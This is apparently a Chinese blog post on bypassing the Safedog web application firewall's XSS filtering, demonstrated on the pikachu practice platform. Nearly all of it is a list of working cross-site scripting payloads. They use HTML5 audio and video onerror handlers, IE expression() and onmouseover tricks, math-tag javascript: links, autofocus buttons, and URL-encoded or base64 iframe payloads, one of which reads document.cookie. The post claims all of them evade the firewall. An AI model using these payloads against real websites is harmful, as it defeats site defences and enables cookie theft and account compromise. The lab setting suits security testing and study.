安全狗XSS攻击绕过

默认安全狗网站防护模块中,将XSS漏洞攻击拦截全部处于开启状态

 

 选择漏洞平台pikachu,使用XSS模块

 

 正常的,输入一段XSS代码(aaa'"><script>alert("222")</script>)后,会被WAF拦截

 

 WAF检测机制默认的将诸如:alert、prompt、comfirm等弹窗类的标签,都做了限制

1.H5新标签<audio>绕过:

<audio src=x onerror=alert(47)>

 

<audio src=x onerror=prompt(1);>

 

 

2.H5新标签<video>绕过:

<video src=x onerror=prompt(1);>

 

 

<video src=x onerror=alert(48)>

 

3.HTML<div>标签绕过: 

<div%20onmouseover%3d%27alert%26lpar%3b1%26rpar%3b%27>DIV<%2fdiv>,这个方法只在IE中会弹窗

 

 <div style="width:expression(alert(/1/))">1</div> ,在IE中弹窗 

 

 

 3.HTML<math>标签绕过:

<math><a/xlink:href=javascript:prompt(1)>Xss

 

 

 

<math href="javascript:javascript:alert(1)">Xss</math>

 

 4.HTML<button>标签绕过:

<button onfocus=alert(1) autofocus>

 

<button/onclick=alert(1)%20>xss</button>

 

 

 5.HTML<iframe>标签绕过:

<IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>,读取cookie

<iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>

<iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">

 

 以上方法均可绕过WAF XSS限制,部分功能需要在IE浏览器中进行测试。

 

posted @ 2021-09-27 23:34  田家少闲月-  阅读(867)  评论(0编辑  收藏  举报